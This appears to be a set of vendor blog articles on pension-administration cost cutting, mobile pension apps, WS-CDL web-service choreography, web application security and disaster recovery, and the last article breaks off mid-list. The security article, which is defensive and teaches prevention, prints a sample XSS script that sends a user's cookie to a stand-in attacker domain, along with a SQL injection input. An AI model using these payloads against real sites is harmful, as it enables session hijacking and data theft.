Giving Retirement Participants More Services And Reducing the Costs of Pension Administration


The challenge of offering more retirement services while also reducing administrative fees leaves many recordkeepers wondering: how did we get here?  The three main drivers are:

  • Increased fee disclosure, which exposes fees once offset with hidden asset charges.  Administrators who relied heavily upon 12b-1-type fees are struggling to compete now that all the fees are on the table.  A few administrators kept separate and fair service fees and are doing fine, but most will have to make dramatic cost cuts in the next year or so.  Previously subsidized administrative processes are now being forced into substantial and overdue rework.
  • Supporting heavy internal software builds of custom modules.  These modules were developed back in the day to support new services or prop up lagging vendors – a lot of good intentions.  However, that functionality has since become a commodity, yet the administrator is still maintaining tangled custom code which now strangles their ability to reduce costs and adopt new features.
  • A massive paradigm change in infrastructure provisioning.  The use of cloud environments and virtual servers is common and solid – the biggest and most secure companies are moving forward full throttle.  The administrator who is trying to maintain a physical data center with blinking lights will not be able to provide the service or get control over their costs.  Cloud provisioning of secure servers has moved these costs from thousands of dollars (fully loaded) to only a few dollars per month.  And the uptime and performance far exceed anything the administrator has in their own data center.

The solution is some basic restructuring and some correctly applied technology.  This change must be attacked with a concerted effort, but it is often best implemented in a controlled and measured manner.  Administrators who cannot address the key challenges will be out of business inside of 12 months.

  • Push more self-service to the employer and the participant.  This is typically done through newer, more flexible web portals.  Employers and participants are growing smarter every day and want to take more control over their accounts.  Many items long deemed to require administrator handling can now be handled entirely on the web.
  • Standardize the payroll on-boarding process to remove rework, manual intervention, and errors.  Administrators are always surprised to see the incredible amount of rework that is actually happening in their back office payroll processing.  This is the most expensive process in administration and unfortunately the area with the least amount of standard processes.  A successful approach has been to actually pay employers to adopt a standard and complete interface – the key is to make the interface self-contained.
  • Move quickly toward mobile apps.  The mobile app not only forces the administrator to look at what really matters on the screen, but it also gets participants more involved with their accounts on a daily basis.  The web is passive but mobile apps are active.  In the next 12 months, primary account access will move from web to mobile.  The game has already changed.
  • Deploy a common publishing database for all plan artifacts.  This includes statements, documents, forms, and reports.  Employers and participants are both looking for just-in-time delivery of the critical items they need – not sent to them, but held in a secure repository available when needed.  Looking around the market, there are few tools which effectively do this in the context of employers, plans, and advisors (SharePoint is not the answer).  The key is to have a file exchange mechanism where items can be quickly and securely published to any plan entity.
  • Rework and rethink the web design.  Pension websites evolved with a kitchen-sink mentality into many pages, buttons, and icons – unfortunately most are never used.  The winners will scale back their sites using a hierarchical approach to focus on the happy paths, and transition the language from industry jargon like ‘transactions’ to ‘life events’.  The user experience will be more holistic and managed through easy-to-understand wizards.  The remaining challenge is that web screen sizes now range from tablets to wide screens.  This means the modern website must use ‘responsive coding’ to tailor itself to whatever screen size the user presents – not just scaling, but actually changing the layout, menus, and content.

Based upon many years of working in the trenches with industry-leading software and administrators, these are the challenges and the pitfalls.  This experience has enabled a vision for the future and a pathway of simple solutions.  These solutions can be done without big-bang technology rollouts or professional service engagements.  But it does often require a big internal cultural shift from the top down to adopt new ways of thinking and leave behind some pet projects.

Click here to find out how we are helping our clients reduce costs and deliver more!

Is Your Pension Mobile Yet?


As the costs for retirement administration are forced more into the open, providers will be looking for new ways to stand out in the crowd.  Participants are demanding more services, faster access to information, and drastically reduced costs.  The old model of just delivering statements or even updating a static website will no longer keep the younger generation’s attention.  The pension world has moved past paper, through voice response, on past the web, and onto mobile.

The mobile app will give administrators, for the first time:

  • Deeper penetration into the participant base (in everyone’s hands)
  • Secure connection (deliver confidential data)
  • Intimate relationship (specific alerts)
  • Focused message (just the facts)

 However, the administrator must carefully select their app provider as this is still the mobile wild wild west:

  • There are many devices, and the same app is not always compatible across different brands.
  • The mobile providers are rapidly changing their operating systems, which mandates frequent updates.
  • Unfortunately, there are few development tools.
  • On some platforms, the app is unable to lock devices.
  • Legacy back office systems do not necessarily support mobile devices.
  • And most importantly, it is difficult to synchronize the data with the presentation on the existing website or voice response system.

The best approach is to get an app into the market quickly in order to gain some experience and feedback.  This is not a fire-and-forget model like the early voice response systems and websites.  The apps will need to continue to evolve, so avoid the temptation to wait until the perfect app can be designed and validated.  In order to get something to market quickly, consider a platform which can do the following:

  • No personal data stored on device (all transient data)
  • Use existing multi-factor authentication with existing credentials
  • Multi-factor compliance with device ID (UDID)
  • Optional to require web device approval
  • Uses SSL for data in transit

 Of course, transactions can easily be added later.  But the transaction rollout needs to be focused on what the participant would really want to manage quickly.  This is not just a duplication of the available web-based transactions.  The larger, more complex transactions are likely to remain on the website.  However, quick changes in response to a personal alert should be available on the mobile app, with suitable mobile controls to make it easy for the participant to interact with their pension while on the go.

There are 2 approaches to the mobile market: the native mobile app and the mobile website.  The mobile app takes full advantage of the local device for performance and navigation, while the mobile website essentially uses adjusted HTML to simply present a smaller web.  The challenge is to avoid thinking of the mobile app as just a ‘smaller’ web.  The provider MUST rethink their presentation in terms of ONLY what the participant really needs to see as they are catching an airplane, picking up kids from school, or at lunch.  The mobile website is still heavily dependent upon bandwidth and HTML-style navigation, whereas the mobile app can have much higher performance and present true mobile navigation features.  Some of the better mobile apps contain the following:

  • Each App has custom skin to match web look and feel
  • Native apps maintained as simple as possible (high portability) – host based graphics
  • Screen zones tailored by host based XML (easy host-side tailoring)
  • Use real-time connectivity to back office system or alternative ODS

 The platform which drives the mobile app is the real secret.  It must deliver processed data, preferably XML, to the device and leave the presentation and graphics to the local app.  However, in some cases, pushing the graphics can be an advantage – such as bar or pie charts, which are still very difficult to render in the mobile world, largely because of OS variations.  The best mobile apps will be built upon the following (a sketch follows the list):

  • Fast aggregate single interactions (client-server)
  • No rule or data duplication
  • Use existing script based rules
  • Open system XML and XSLT (same rules and data as web)
  • Include data from alternate sources
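
To make the list concrete, here is a minimal host-side sketch in Python – illustrative only, with invented element and plan names – of a single client-server interaction that aggregates balances from several back-office sources into one processed XML payload, leaving all presentation to the device app:

# Minimal sketch: one request from the device, one aggregated XML answer.
# Element names, plans, and balances are illustrative.
import xml.etree.ElementTree as ET

def build_summary_xml(participant_id: str, sources: list[dict]) -> bytes:
    """Aggregate balances from several back-office sources into one payload."""
    root = ET.Element("participantSummary", id=participant_id)
    total = 0.0
    for source in sources:
        acct = ET.SubElement(root, "account", plan=source["plan"])
        ET.SubElement(acct, "balance").text = f'{source["balance"]:.2f}'
        total += source["balance"]
    ET.SubElement(root, "totalBalance").text = f"{total:.2f}"
    return ET.tostring(root, encoding="utf-8")

payload = build_summary_xml("P-1001", [
    {"plan": "401k", "balance": 52340.11},
    {"plan": "457", "balance": 1210.50},
])
print(payload.decode())  # the device app renders this however it likes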

 Beware of the imposters!  There are some mobile apps which look a lot like a mobile website.  The app is basically just a container.  This gives the provider the appearance of being able to migrate code from one device to another – but all they are really moving is the web service calls and the frames.  The advertised advantage is the ability to modify the application without re-issuing it – sounds good.  However, the distribution process for applications is so easy, streamlined, and automated that the benefit is negligible.  Meanwhile, the performance cost of the additional communication is high and the loss of navigational functionality is painful.  Today's mobile devices are more powerful than the computers many of us took to college, so why not use them?  Be sure you are getting the native mobile app you deserve.

The best place to start is with the iPhone™.  Regardless of your phone preference, the reality is that Apple has the easiest and most efficient rollout path.  For example, TestFlight™ makes the iterative issuance of test versions quick and simple.  The recommended strategy is to get a solid application working on the iPhone and then quickly cookie-cutter it out to Android and Windows Phone 7.  This avoids having moving requirements on 3 platforms.  If designed right, the code can be ported between platforms, but to date there is no proven code generator for a full native app.  There are some instances of scripted conversion where the app is essentially a frame using host-based HTML, but this makes the user suffer daily for a few hours of one-time programming effort.  The rollout needs to avoid the temptation to develop the ‘perfect app’.  Again, this is not the world of fire and forget.  The application management strategy needs to include a plan for continuous review and tuning.  The usage patterns and needs will continue to evolve at an ever-increasing pace.  So if done right, the screens and functions rolled out today will not be the same ones your community will be using in 6 months.

Then, many shops will take a look at the iPad 2.  This will be the single most revolutionary device for the pension space in the next few years.  It is the only channel which allows rich navigation and the ability to quickly tune it to the user.  However, care must be taken to not just 2x (size up) the smartphone app.  This is a DIFFERENT platform with new characteristics, not the least of which is the screen size.  The iPad will allow administrators to skip past the paper and get direct input from participants even in remote meetings.

The smartphone and iPad applications will take our pensions mobile.  They will allow administrators to reach wider into their population and develop a far more intimate relationship with their participants.  Never has there been a channel available to so many people across socioeconomic lines.  The progressive administrators will be doing things like:

  • Integration with social media for ‘retirement badges’
  • Shake for sample portfolios
  • Market information for sticky use
  • Quick balance check
  • Secure alerts for key events
  • Direct enrollment
  • QR codes for quick reference information

 The smartphone allows users direct and quick access to their pension data.  And it forces providers to thin down the data to ONLY what the participant really needs to focus on.  The participant can see what matters with a click of a button.  No more remembering websites or complicated logon routines.  The mobile app is not just a scaled-down version of a website.  It is a targeted and concise pension control that is at the participant’s fingertips almost 24×7.  Although participants are not yet making widespread demands for this access, it will be the single most used channel by the end of 2012.

How to teach your web to Tango



On the e-commerce business dance floor, the new digital jumps and jives demand real-time connections to many business steps and swings. No longer is it satisfactory to just shuffle data to update a single process overnight in batch. For example, a consumer enters a website to buy a new PC. The transaction must interact with the vendor CRM system, the vendor inventory (ERP) system, and a payment clearing service (e.g., Authorize.Net). The challenge is that all of the required left-footed touchpoints are not necessarily listening to the same music. In order to solve this tangled mess, web developers must teach their webs to tango.

In the past, these web dance steps were strictly defined and tightly coupled. The digital participants simply stepped into painted shoe prints on the cyber floor. This enabled high efficiency, but changes were difficult and expansion opportunities limited. If any system were changed, then all had to be upgraded or retested, as the changes could have a wide impact. If the vendor needed to expand, it was difficult to engage products from other vendors with systems not under local control. Our webs were being pushed to do more than the 2-step, but the costs were too high to learn the more exotic dances.

The first solution was to establish “orchestration”. This is essentially a locally hosted, centrally defined model of how the interaction will behave. Certainly a conductor could enforce the right moves, right? The developers essentially enforced a certain structure for inputs, outputs, and error handling. This evolved into WS-BPEL (Business Process Execution Language), which can be defined as (3):

· It is a web service with runtime semantics and central control

· Abstract definition of end point protocols

· Executes the specified WSDL (Web Services Description Language) message calls

· Encourages reuse of WSDL resources

But this still didn’t create the beautiful ballet we needed. The primary difference between orchestration and choreography is executability and control. An orchestration specifies an executable process that involves message exchanges with other systems, such that the message exchange sequences are tightly controlled. In other words, orchestration refers to the central control of a distributed system while choreography refers to a distributed system which operates according to choreography rules but without centralized control. (1) The challenges to the old orchestration WS-BPEL dance are:

· It requires centralized execution

· The semantics are not globally formalized

· It is not scalable as dual control and connectivity are required

· It is rigid so it is non-collaborative

Originally marketed by Oracle, the Web Services Choreography Description Language (WS-CDL) is a specification by the W3C defining an XML-based business process modeling language that describes collaboration protocols of cooperating peer Web Services. The XML model defines a global scenario which is long-lived and stateful without a single point of control. Each service executes its own orchestration based upon its defined role and sequence. (2) The W3C Web Services Choreography Working Group was closed on 10 July 2009, leaving WS-CDL as a Candidate Recommendation which is intended to (3):

· Promote a common understanding between services

· Automatically guarantee conformance which reduces cost of ownership

· Ensure interoperability through behavior contracts

· Increase robustness and utilization

· Generate code skeletons

 

The key components of WS-CDL are:

· Interactions

· Channels

· Participants

· Roles

· State

WS-CDL fits on top of the new technology stack as the key glue to bring it all together and make it work in the global context (4).

The design approach is different:

· BPEL: Design the baby steps first then put them together into a waltz.

· WS-CDL: Establish the flow of the tango first then distill it into simpler moves. (From WS-CDL we can generate BPEL/Java/C# logic for each participant.)

This gives very different results (4):

  • BPEL: Participant specific viewpoints of control-flow (sequence, flow, switch, control links, exception handlers) based on the rigid imperative model
  • WS-CDL: Global reactive rules for declaratively prescribing normal/abnormal progress, based on the flexible information driven model

The components of WS-CDL are:

  • Typing. This defines the information types and location.
  • Identifying & Coupling Collaborating Participants. In other words, the XML defines the participants, their roles, and how they relate together so there is no overlap or competition causing race conditions or deadlocks.
  • Information Driven Collaborations. The key elements are the channel type, variable definitions, activities, and units of work. For example:

<variableDefinitions>
  <variable name="ncname"
            informationType="qname" | channelType="qname"
            mutable="true|false"?
            free="true|false"?
            silent-action="true|false"?
            role="qname"? />+
</variableDefinitions>

  • Activities. These are interactions which enable collaborating participants to communicate and align information.

The end purpose of choreography is to combine actions with common behavioral characteristics, building a unit of work. In order to list all the binary relationships, the dance is often expressed in complex pi-calculus notation. The notation shows alternative patterns of behavior using workunits. This enables backward recovery by using exception handling, and forward recovery by finalizing already completed activities. But it has some drawbacks (5):

• Lack of separation between meta-model and syntax. The WS-CDL specification tries to simultaneously define a meta-model for service choreography and an XML syntax.

• Lack of direct support for certain categories of use cases. Currently, WS-CDL does not support use cases with one-to-many or multi-transmission interactions.

• Lack of comprehensive formal grounding. While WS-CDL borrows some terminology from pi-calculus, there is no comprehensive mapping from WS-CDL to pi-calculus or any other formalism.

The bottom line is that choreography complements orchestration. Choreography is concerned with global, multi-party, peer-to-peer collaborations between application components, distributed within or across an organization’s trusted domain (5). WS-CDL can get a developer’s web into the global ball. However, its complex notation and broad scope may be so overwhelming that many dancers just sit this one out and head for the bar.

References

(1) Business Process Execution Language. http://en.wikipedia.org/wiki/WS-BPEL

(2) Web Service Choreography. http://en.wikipedia.org/wiki/Web_Service_Choreography

(3) Web Services Choreography and Process Algebra. Steve Ross-Talbot. 29 April 2004. http://www.authorstream.com/Presentation/Junyo-29185-WS-CDL-Web-Services-ChoreographyandProce-ss-Algebra-Agenda-Orchestration-vs-Choreography-BPEL-as-Entertainment-ppt-powerpoint/

(4) Aggregating Web Services: Choreography and WS-CDL. Nickolaos Kavantzas, Oracle. http://www.fpml.org/_wgmail/_bpwgmail/pdf0BHcCh7tU4.pdf

(5) A Critical Overview of the Web Services Choreography Description Language. Alistair Barros et al. BPTrends, March 2005. http://www.bptrends.com/deliver_file.cfm?fileType=publication&fileName=03%2D05%20WP%20WS%2DCDL%20Barros%20et%20al%2Epdf

(6) Web Services Choreography Description Language Version 1.0. W3C Candidate Recommendation 9 November 2005. http://www.w3.org/TR/ws-cdl-10/

(7) WS-Choreography Definition Language (WS-CDL). EBPML working group. http://www.ebpml.org/ws_-_cdl.htm

(8) http://lists.w3.org/Archives/Public/public-ws-chor/2004Jun/0024.html

Website Security Engineered into the Design


The Challenge

A website is open to the public on an anonymous basis.  It must be easy to use, but it must also protect both the user and the business.  A website which does not deploy reasonable security precautions is open to hacking.  Hacking is not mysterious and in some cases is quite easy, and it can result in the following huge problems:

  • The site displaying unwanted or inappropriate messages
  • The users web identity being hijacked
  • A loss of critical data for the company
  • Public loss of confidence

A site’s security depends upon many components, from the IT infrastructure down to the user’s desktop.  This discussion will assume all appropriate environment controls are in place and effective, and that the user has taken reasonable precautions.  The focus will be on the most common vulnerabilities in public-facing web applications and the best practices to close the gaps.  There is no single countermeasure that will guarantee web security; however, a suite of careful protections designed into the web architecture can deliver a reasonable level of security.

Unfortunately, HTML was originally used to simply markup documents; then, the use was expanded dramatically on the web.  Thus, by tasking it beyond its original design, many vulnerabilities have surfaced which can easily be exploited unless specific safeguards are deployed.

There are many good benchmarks for web application security design from the SANS Institute, MITRE, and the Open Web Application Security Project (OWASP) 3.0.  These guides show the most common problems and generally accepted best-practice solutions.  The following discussion drills down into some of the key problem issues that often result from coding, design, or implementation errors or omissions.  The goal herein is to show how vulnerability within web applications can be limited or even prevented.

Common problems

A website can be made vulnerable to attack through ignorance, bad design, or sloppy implementation.  In some cases, the website builder is just not aware of the gaps in HTML.  A site that is well designed from the ground up with the common vulnerabilities in mind will fare far better.  But it all requires careful and thoughtful implementation and testing for a complete security umbrella.  Some of the most common issues that a good design must guard against are:

  • Failure to preserve web page integrity, which opens the door for the insertion of cross-site scripting (XSS).  This occurs whenever a site accepts input directly without sufficient validation.  The malicious input is typically a script which can steal the user’s session identity, display unauthorized messages, and/or collect unauthorized data.  The injection is typically done with short scripts in common languages such as JavaScript.  The vulnerability exploits the trust the user has in an existing site.  The approaches are:
    • Non-persistent or reflected – script commands used immediately to generate page content to collect information about the site.
    • Persistent or stored – script commands embedded in comments on a site to collect information about other users.
    • DOM (Document Object Model) – client-side hijacking during the assembly of the HTML, typically with error messages.

A typical example is a comment field that echoes input back without validation.  A short script posted as a comment, such as <script>document.location='http://attacker.example/?c='+document.cookie</script> (the domain here is illustrative), will ship each viewing user's session cookie off to the attacker.

  • Failure to preserve SQL query structure (SQL injection) within the page.  This occurs most commonly where a site uses resolved SQL commands to collect data from a host database – that is, the SQL commands contain variables which are populated by user input.  The attacker realizes this by examining the page source, then supplies additional commands as the input.  The input simply terminates the existing SQL command prematurely and inserts the attacker's own request with valid SQL query structure.  The expanded SQL query is executed along with the original SQL code, returning the information the attacker requested.  This gives an attacker an opportunity to search the site database for progressively deeper and deeper information.  Items that can be retrieved and/or modified include:

  • The list of users
  • User credentials
  • A user's email address (changed)

For example, entering the following as the username input:

'' OR '1'='1'

means that

statement = "SELECT * FROM users WHERE name = '" + userName + "';"

becomes

SELECT * FROM users WHERE name = '' OR '1'='1';

which matches every row in the users table.
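
The generally accepted countermeasure is to keep user input out of the SQL text entirely by using parameterized queries, so the statement structure is fixed before any input arrives.  A minimal Python sketch (sqlite3, with an illustrative users table) shows the same hostile input failing against a bound parameter:

# Minimal sketch: parameterized queries keep user input out of the SQL text,
# so "'' OR '1'='1'" is treated as a literal name, not as SQL structure.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'alice@example.com')")

user_name = "'' OR '1'='1'"  # hostile input from the login form

# Vulnerable: concatenation lets the input rewrite the query structure.
# statement = "SELECT * FROM users WHERE name = '" + user_name + "';"

# Safe: the driver binds the value separately from the SQL text.
rows = conn.execute("SELECT * FROM users WHERE name = ?", (user_name,)).fetchall()
print(rows)  # [] -- the injection attempt matches no user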

 

 

 

  • Inadequate session management invalidates the authentication and rights controls for the website usage.  When a user is initially authenticated upon entering a site, they are provided a session ID (SID).  However, the challenge is how to store and pass the SID between pages as the user navigates the site.  This is necessary because HTML is essentially stateless without additional controls.  There are 3 methods to provide state to a set of pages:
    • GET method.  This simply passes the SID in the query string: http://mysite.com/page1.aspx?session=123456789
    • POST method.  In this case, the SID is contained in the input, select, and text form tags in the HTML page.
    • Cookie.  This writes the SID to the local browser temporary space.  Modern browsers do a better job of restricting access to the SID to only the authorized and originating site, but older browsers have big gaps.  However, the access control significantly depends upon the data in the cookie.

All of these methods can be made secure or insecure depending upon the application.  According to the SANS Institute, “all of the methods can be made reasonably secure through intelligent design.”

The vulnerability exists when a valid SID is stolen or an imposter SID is created.  The goal of many site attacks is precisely to get a SID.  In other cases, weak sites are built with downloaded widgets to create the site SIDs; however, the construction of SIDs using public-domain tools is often predictable.  There are several web resources available that show the construction of SIDs for many popular web frameworks.

  • Cross-site request forgery (or CSRF) is where the user’s browser is tricked into sending unauthorized requests to a target site on the user’s behalf without any action on the part of the user.   A malicious instruction set is placed in a public forum, often in an image, which gives hidden instructions to the browser acting as a deputy for the user.  As an example, the scripts can request the browser to:
    • logon to sites on behalf of the user
    • send out weak stored passwords and SIDs
    • engage transactions

Fortunately, CSRF can inflict its worst damage only when the user is simultaneously logged onto both the attacking site and the target site.  However, browsing multiple sites at once is common.

  • Clear text transmission of sensitive information can expose both user and site data.  This problem can arise either between the desktop browser and the web server, or between the web server and the database host.  The most critical zone is the public internet space between the end user and the website.  While en route, the data can travel through many hops and be deposited in many caches and logs.  This is where it is vulnerable to sniffers and other monitors.

Application Best Practices

The following are common methods used to minimize the most common web vulnerabilities.  There is not one single element that will make a website secure; however, when taken in combination with active monitoring, a website can be made reasonably secure.  A website must be designed to:

Contain strong field validations on ALL input

All inputs must be validated.  The simple approach of escaping string input is a good start, but it is not sufficient.  Escaping is the process of simply replacing the 5 significant HTML characters.  Unfortunately, the scripting variations are too complex and clever.

  • The simplest control is to limit the field size to ONLY the expected input.  The inputs must be validated for length, type, and syntax before being used or displayed.
  • Then look for and accept only the values expected (referred to as a white list).  As sanitizing input has not proven successful, it is best to simply reject invalid input (see the sketch below).
  • And if still needing additional validation, use a vetted library such as the Microsoft Anti-Cross Site Scripting (Anti-XSS) Library 1.5.
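
As a concrete illustration of this whitelist-and-escape approach, here is a minimal Python sketch; the field name, length limit, and pattern are illustrative assumptions:

# Minimal sketch of whitelist validation: accept only the expected shape,
# reject everything else, and escape on output as a second layer.
import html
import re

USERNAME_RE = re.compile(r"[A-Za-z0-9_]{1,20}")  # length, type, and syntax

def validate_username(raw: str) -> str:
    if not USERNAME_RE.fullmatch(raw):
        raise ValueError("invalid username")  # reject; do not try to sanitize
    return raw

def render_greeting(raw: str) -> str:
    name = validate_username(raw)
    return "<p>Hello, " + html.escape(name) + "</p>"  # escapes & < > " '

print(render_greeting("alice_99"))
# render_greeting("<script>alert(1)</script>") raises ValueError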

As it is impossible to eliminate the use of cookies, the cookies must be protected as much as possible.  A session cookie can be flagged HTTP-only so scripts cannot read it, and the server can additionally restrict its use to the originating IP.  However, there are still exceptions around these protections.
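
A minimal sketch of the cookie flags using Python's standard library follows; the SID value is illustrative, and the originating-IP restriction would be a separate server-side check rather than a cookie attribute:

# Minimal sketch: flag the session cookie HttpOnly (hidden from scripts) and
# Secure (sent only over SSL).
from http.cookies import SimpleCookie

cookie = SimpleCookie()
cookie["SID"] = "3f9a1c0b7e"      # illustrative opaque session ID
cookie["SID"]["httponly"] = True  # unavailable to document.cookie / XSS
cookie["SID"]["secure"] = True    # never sent over plain HTTP
cookie["SID"]["path"] = "/"

print(cookie.output())  # the Set-Cookie header to emit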

Use a strong output encoding for all pages generated (such as ISO-8859-1 or UTF-8), and do not allow the attacker to select it.

Deploy a Strong Session Management Strategy

Building in a strong session management approach will significantly limit the exposure if the site is penetrated through one of the other vulnerabilities.  And conversely, no additional controls, including encryption, can compensate for weak session management.  The basic logon controls usually start out solid, but gaps often occur when implementing ancillary functions such as logout, timeout, remember me, and keep-alive.  The best methods for maintaining control of the session are:

  • Store only general information in the SID.  Even if hashed, do not store any user credentials as part of the SID.
  • If using the GET method, use referrer filtering.  This simply means washing each page through a link-filter page so the referring page is dropped.  Without this step, the SID remains part of the page because of the referring page.  However, some graphics and advertisements can still thwart this protection.
  • Verify that public error messages and crash dumps do not contain the SID.
  • Automatically expire SIDs after a period of inactivity or an absolute time.  This also means not allowing users to inherit an existing open SID or provide their own SID.  If the user logs on and a SID is still open, it must be expired and a new one generated.  A site must be ‘strict’ about assigning a unique SID to each user.  (A permissive site accepts user-supplied SIDs or allows inherited SIDs.)  The reason sites do not allow multiple concurrent logons is to make it possible to determine whether a SID has been stolen or duplicated.
  • Use a strong SID construction of at least 32 characters.  With a 62-character alphanumeric alphabet, this means 62^32, roughly 2.27×10^57, possible combinations – that is sufficient.  It is best to use the built-in SID generators that come with many of the popular platforms and avoid home-grown controls or downloaded widgets (a sketch of the idea follows this list).
  • Manage the generated SIDs on the server side within a database.  Do not store them in a temporary location subject to alternate rights authentication.  It is best to also hash the SIDs within the database to force their use only through the application.
  • Build in a logging and alerting system to record attempted uses of expired SIDs.  This will aid in the detection of a site attack and also identify a DoS (Denial of Service) attack, which can be mounted by sending invalid SIDs to the system to force the logout of legitimate users.
  • Every page should have a clearly displayed ‘Logout’ button.  Too many sites, in their effort to keep users on the site, make the logout button difficult to find.  Thus, all too many users simply close the browser window and rely upon the SID timeout.
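
As a sketch of the SID-construction guidance above (illustrative only; the recommendation remains to prefer your platform's built-in generator):

# Minimal sketch: a cryptographically random 32-character alphanumeric SID,
# stored server-side only as a hash so it is usable only through the application.
import hashlib
import secrets
import string

ALPHABET = string.ascii_letters + string.digits  # 62 characters

def new_session_id(length: int = 32) -> str:
    # 62^32 is roughly 2.27e57 possible values, matching the guideline above
    return "".join(secrets.choice(ALPHABET) for _ in range(length))

def stored_form(sid: str) -> str:
    return hashlib.sha256(sid.encode()).hexdigest()  # what the database keeps

sid = new_session_id()
print(sid, stored_form(sid))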

Deploy Forgery Prevention

A site must recognize that it may be subject to automated actions on behalf of users.  These CSRF actions often have tell-tale signs that can be recognized and stopped.  A site is less exposed to unauthorized deputy actions when it:

  • Does not rely solely upon a cookie.
  • Requires and validates the HTTP referrer.  This is the header in each request showing the page where the user request originated.
  • Uses additional transaction confirmation authentication.  This is common when changing a password, but can also be used upon confirmation of a final purchase or action.  Multi-factor confirmation such as a random picture code effectively disables unattended scripted actions.  A minimal token-based sketch follows.
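
One widely used measure in this family is a synchronizer token tied to the session; here is a minimal Python sketch, with illustrative names and an in-memory store standing in for the real session database:

# Minimal sketch of a synchronizer token: each session gets a random token,
# every state-changing form carries it in a hidden field, and the server
# rejects any post whose token does not match.
import secrets

sessions: dict[str, str] = {}  # session ID -> CSRF token (server-side store)

def issue_token(sid: str) -> str:
    token = secrets.token_urlsafe(32)
    sessions[sid] = token
    return token  # embed this in a hidden form field

def verify(sid: str, submitted: str) -> bool:
    expected = sessions.get(sid)
    return expected is not None and secrets.compare_digest(expected, submitted)

tok = issue_token("SID123")
print(verify("SID123", tok))       # True  -- legitimate form post
print(verify("SID123", "forged"))  # False -- scripted cross-site request fails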

Use Secure Socket Layer (SSL)

In today’s world, secure transmission is largely handled by Secure Socket Layer (SSL).  A 3rd-party certificate is used to encrypt the data in transit, visible to the user as an https: address.  This largely secures the communication in the public internet zone.  However, it does not cover the connection between the web server and the database host.  That connection can be secured by using a closely routed switched network and setting the NIC interfaces to non-promiscuous mode.  In this manner, internal networks are substantially secure (except for the WAN).  However, some implementations are looking at transmission encryption on the back side as well.  This can be done with Microsoft’s transparent data encryption (TDE) for SQL Server 2008.

Explore Alternative Measures

In some cases, users may opt to suspend scripting on their browser.  However, this eliminates much of the modern functionality demanded for usability.  There are domain/zone based controls for client-side scripting but this requires advanced knowledge and skills that are usually unavailable to the average user.  So scripting is probably here to stay, but a site can still educate the users on best practices and show them how to properly identify the official site.

Use Intermediary Page Generation Handlers

For new websites, the best approach is to architect the site engine to use an intermediary page assembler.  This processor accepts only expected input parameters, consumes the XML data from various sources, adds static content, and then responds with the HTML page.  The user inputs from the browser are never directly used by the page or the SQL.  Instead, the specific user inputs are validated and used in a managed replacement process to generate dynamic actions.  This buffer not only makes it difficult for the attacker to see how the variables are used, but also prevents unexpected inputs from getting into the final assembly and being executed.  An example of this secure modular web framework is used by Planserve Data Systems.
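
A minimal sketch of the assembler concept follows; the parameter names and patterns are illustrative assumptions, not Planserve's actual implementation:

# Minimal sketch: the assembler accepts only expected parameters, validates
# each against a pattern, and performs a managed substitution -- raw user
# input never reaches the SQL or the final HTML.
import html
import re

EXPECTED_PARAMS = {"report": r"[a-z]{1,20}", "year": r"\d{4}"}

def assemble_page(params: dict[str, str]) -> str:
    clean = {}
    for name, pattern in EXPECTED_PARAMS.items():
        value = params.get(name, "")
        if not re.fullmatch(pattern, value):
            raise ValueError(f"unexpected input for {name}")
        clean[name] = html.escape(value)
    return f"<h1>Report: {clean['report']} ({clean['year']})</h1>"  # static shell + validated values

print(assemble_page({"report": "balances", "year": "2011"}))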

 

Conclusion

The purpose of this discussion is to help application developers avoid the common issues when designing, coding, and implementing an external facing web application.   These items must be considered before the first page is constructed or the site colors picked.

Before going into production, every website should be subjected to a thorough ‘penetration’ test.  There are several 3rd parties and tools which can be used to conduct an independent test.  However, it is costly and difficult to address vulnerabilities found at late stages of a web deployment project.  Any mitigation steps at that point are likely to be patchwork workarounds which will either fail or introduce other vulnerabilities. 

In order to prevent this project nightmare, the discussion here presented methods to address or mitigate the common vulnerabilities during the initial design and architecting of the site.  The site security must be baked in from the initial design all the way through to the final implementation.  If these key measures are implemented in a structured manner, the site will be reasonably secure.

 

References

 

http://msdn.microsoft.com/en-us/library/aa973813.aspx

http://en.wikipedia.org/wiki/Cross-site_scripting

http://www.sans.org/reading_room/whitepapers/webservers/secure-session-management-preventing-security-voids-web-applications_1594

http://www.bestsecuritytips.com/xfsection+article.articleid+169.htm

http://www.cgisecurity.com/owasp/html/guide.html#id2843025

http://www.owasp.org/index.php/Top_10_2007

http://www.acunetix.com/websitesecurity/xss.htm

www.planserve.net

www.hackthissite.org

Disaster Recovery is dead


If your IT shop is less than perfect, you are already an expert in disaster recovery at many levels.  The reason is the faulty way applications have traditionally been implemented.  This means spending more and more time on recovery efforts, but still not often getting the results the business demands.  Disaster recovery plans are a lot like elephant repellent in New York City: the effectiveness remains unknown until it is too late.  Fortunately, disaster recovery will no longer be needed after the end of 2011.

The doubters will be quick to point out high availability is now a standard business expectation.  The systems have to stay up.  The perceived demands on IT continue to inflate.  But what is the business really demanding?  Do the customers really want to pay for it? Or is the overhead of disaster recovery just to avoid employee inconvenience or to provide executives with plausible deniability?  The challenge is IT staffs have fallen into a tradition of separating application design, implementation, and recovery.   The failure of this approach is catastrophic:

  • Budget-minded small to midsized businesses (SMBs) once viewed business continuity (BC) planning as an expensive luxury. Not anymore. Upgrading disaster recovery (DR) capabilities is a major priority for 56% of IT decision makers in the U.S. and Europe, according to Forrester Research Inc.
  • While companies think they’re immune to any long-term outage, more than one-fourth of companies have experienced a disruption in the last 5 years, averaging eight hours, or one business day. Source: Comdisco Vulnerability Index.
  • The U.S. Department of Homeland Security says one in four businesses won’t reopen following a disaster.

But what is a Disaster Recovery Plan?  If you ask IT staff, it is rebuilding boxes.  If you ask the communications manager, it is re-establishing connectivity.  If you ask the PM, it is a large collection of nicely formatted documents.  So which of the following is a disaster recovery plan?

  • Backup Tapes
  • Document
  • Software
  • Contracts
  • Recovery site
  • Server Virtualization

Perhaps we find that it is really none of the above.  The individual items lead us to an overly narrow view of the effort, and away from the business.  We will find that an ounce of prevention is worth a terabyte of cure.

In order to better understand the needs of recovery, we need to first look at the types of disasters and the likelihood of each occurring.  We are all familiar with the dangers of a hurricane – obviously bad for business.  But equally damaging is a business user posting the same address to all participants or dropping a billing table.  Which is more likely to occur on our watch?  Should the recovery effort really be any different?  The new view of disaster recovery addresses both situations with the same solution.

 

To address these needs, there are various types of recovery strategies.  In fact, ALL companies have a fully functioning disaster recovery plan; the only difference is the result the plan achieves.   The following are common types of plans.  In order to protect the guilty, the businesses using each have been omitted.

  • Denial
  • Bunker
  • Copy
